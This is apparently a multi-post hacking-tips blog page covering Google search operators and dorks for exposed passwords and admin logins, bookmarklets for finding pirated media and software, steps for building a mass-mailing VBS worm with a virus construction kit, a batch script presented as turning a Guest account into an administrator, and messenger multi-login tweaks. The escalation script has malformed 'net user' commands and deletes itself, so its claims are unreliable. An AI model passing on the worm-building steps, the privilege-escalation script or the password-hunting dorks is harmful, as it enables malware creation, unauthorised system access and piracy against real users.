Sunday, May 1, 2016

Google Search Hacking

Well if u ask me this is the best Part " how to Search ",
Anyone anywhere needs something out of the great "www",
now if u know how to grab hold to "something" in one click that is the skill,
this article henceforth is one of my best my best,
n especially crafted to meet all ur needs !!

javascript:Qr='';if(!Qr){void(Qr=prompt('ENTER ARTIST OR SONG NAME:',''))};if(Qr)location.href=''+escape(Qr)+'%22+mp3+OR+wma+OR+ogg+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'
javascript:Qr='';if(!Qr){void(Qr=prompt('Enter Author name OR Book name:',''))};if(Qr)location.href=''+escape(Qr)+'%22+pdf+OR+rar+OR+zip+OR+lit+OR+djvu+OR+pdb+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'
javascript:Qr='';if(!Qr){void(Qr=prompt('ENTER IMAGE NAME:',''))};if(Qr)location.href=''+escape(Qr)+'%22+jpg+OR+png+OR+bmp+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'
javascript:Qr='';if(!Qr){void(Qr=prompt('ENTER MOVIE NAME:',''))};if(Qr)location.href=''+escape(Qr)+'%22+avi+OR+mov+OR+mpg+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'
javascript:Qr='';if(!Qr){void(Qr=prompt('ENTER Application NAME:',''))};if(Qr)location.href=''+escape(Qr)+'%22+exe+OR+rar+OR+zip+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'
javascript:Qr='';if(!Qr){void(Qr=prompt('ENTER GAME NAME:',''))};if(Qr)location.href=''+escape(Qr)+'%22+exe+OR+iso+OR+rar+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'

Just copy from javascript and paste this on u r add bar and enter the details andEnjoy!

Google Operators:

Operators are used to refine the results and to maximize the search value. They are your tools as well as ethical hackers’ weapons.

Basic Operators:
+, -, ~ , ., *, “”, |,


Advanced Operators:
allintext:, allintitle:, allinurl:, bphonebook:, cache:, define:, filetype:, info:, intext:, intitle:, inurl:, link:, phonebook:, related:, rphonebook:, site:, numrange:, daterange

Basic Operators !!

(+) force inclusion of something common

Google ignores common words (where, how, digit, single letters) by default:
Example: StarStar Wars Episode +I

(-) exclude a search term
Example: apple –red

(“) use quotes around a search term to search exact phrases:
Example: “Robert Masse”

Robert masse without “” has the 309,000 results, but “robert masse” only has 927 results. Reduce the 99% irrelevant results

(~) search synonym:
Example: ~food
Return the results about food as well as recipe, nutrition and cooking information.

( . ) a single-character wildcard:
Example: m.trix

Return the results of M@trix, matrix, metrix…….
( * ) any word wildcard

Advanced Operators:

Site: Domain_name
Find Web pages only on the specified domain. If we search a specific site, usually we get the Web structure of the domain



Filetype: extension_type

Find documents with specified extensions

The supported extensions are:

- HyperText Markup Language (html) - Microsoft PowerPoint (ppt)
- Adobe Portable Document Format (pdf) - Microsoft Word (doc)
- Adobe PostScript (ps) - Microsoft Works (wks, wps, wdb)
- Lotus 1-2-3 - Microsoft Excel (xls)
(wk1, wk2, wk3, wk4, wk5, wki, wks, wku) - Microsoft Write (wri)
- Lotus WordPro (lwp) - Rich Text Format (rtf)
- MacWrite (mw) - Shockwave Flash (swf)
- Text (ans, txt)

Note: We actually can search asp, php and cgi, pl files as long as it is text-compatible.

Example: Budget filetype: xls

Advanced Operators “Intitle:”

Intitle: search_term

Find search term within the title of a Webpage

Allintitle: search_term1 search_term2 search_term3
Find multiple search terms in the Web pages with the title that includes all these words

These operators are specifically useful to find the directory lists

Find directory list:
Intitle: Index.of “parent directory”

Advanced Operators “Inurl:”

Inurl: search_term
Find search term in a Web address

Allinurl: search_term1 search_term2 search_term3
Find multiple search terms in a Web address

Inurl: cgi-bin
Allinurl: cgi-bin password

Advanced Operators “Intext;”

Intext: search_term
Find search term in the text body of a document.

Allintext: search_term1 search_term2 search_term3
Find multiple search terms in the text body of a document.

Intext: Administrator login
Allintext: Administrator login

Advanced Operators: “Cache:”

Cache: URL
Find the old version of Website in Google cache

Sometimes, even the site has already been updated, the old information might be found in cache


Advanced Operators

Conduct a number range search by specifying two numbers, separated by two periods, with no spaces. Be sure to specify a unit of measure or some other indicator of what the number range represents

Computer $500..1000
DVD player $250..350

Advanced Operators: “Daterange:”

Daterange: -

Find the Web pages between start date and end date

Note: start_date and end date use the Julian date
The Julian date is calculated by the number of days since January 1, 4713 BC. For example, the Julian date for August 1, 2001 is 2452122


Vulnerabilities date range: 2453196-2453258

Advanced Operators “Link:”

Link: URL
Find the Web pages having a link to the specified URL

Related: URL
Find the Web pages that are “similar” to the specified Web page
info: URL

Present some information that Google has about that Web page
Define: search_term

Provide a definition of the words gathered from various online sources


Define: Network security

Advanced Operators “phonebook:”

Search the entire Google phonebook
Search residential listings only
Search business listings only

Saturday, April 23, 2016

Make a Virus With The Help Of "vbswg 2 beta"

Back in the old days, when viruses ware written in assembler, were small enough to hide in the boot sector of a floppy disk, were able to attach themselves to a file without anyone noticing (and files were quite small those days), had stealth capability, and could influence your hardware directly, bypassing the operating system.

So maybe, maybe in those days, creating viruses could be seen as an achievement, or as a sport. Now, any fool can do it. And judging by the number of viruses, a lot of them do.
Here's how.

1. search the web for something like "Virus Construction Tool" or "Internet Worm Generator". Download it.
2. run the program (click on its icon).
3. fill in the form. Choose interesting names.

4. check the boxes to indicate how you want this virus / worm to spread (e-mail, irc, ...)

5. choose your options for 'payload'

click "Done".
6. click "create virus" or "generate"
7. Save the file
8. run it to see if it works.

This should create a visual basic script that will run on Windows computers and try to use the same Outlook application files to mass-mail itself. Much like the 'I love you' virus or the 'Ana Kournikova' worm.

Saturday, May 2, 2015

Remotely Shutdown Your Computer With Mobilephone

This video will show you how to shutdown your computer from anywhere using a cell phone, Microsoft Outlook and a free account from

Sunday, April 5, 2015

Simpler trick to HACK admin from GUEST

Please Dont missuse This ARTICLE. Its meant for "Educational Purpose" only or for helping those who have lost their PASSWORD.

Copy below to notepad and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
it works.....

echo off
title Please wait...

net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add

del %0

Now you have rights to change Admin password.

Try and comment.........

Friday, February 13, 2015

Multiple login in Google talk, yahoo messenger and Rediff bol

By default all google talk, yahoo messenger and rediff bol allow us to run a single instance of the program at a time.
If you have several gmail,rediff or yahoo accounts, you may want to run multiple instances of google talk, rediffbol or yahoo messenger at once, so here is the trick how to do it…

Multiple Login in Google TALK

1. Create a gtalk shortcut on the desktop.
2. Right click that icon and select properties and then in the target place u will see something like this. “”C:\Program Files\Google\Google Talk\googletalk.exe” /startmenu”
3. Rename it as”"C:\Program Files\Google\Google Talk\googletalk.exe” /nomutex”
4. click apply and OK.

Multiple Login in yahoo messenger

1. Go Run . Type regedit, then enter .
2. Navigate to HKEY_CURRENT_USER / Software / yahoo / pager /Test
3. On the right pane , right-click and choose new Dword value .
4. Name it as Plural.
5. assign a decimal value of 1 by Double clicking it.
6. Now close the registry and login with multiple Ids.

Multiple Login in Rediff Bol

1. Right click on the rediff bol icon and then click on run as.
2. Follow step 1 if you want to login with more than two Ids.
3. You will see multiple rediff bol messenger.

That’s It, if you have any doubts please let me know…..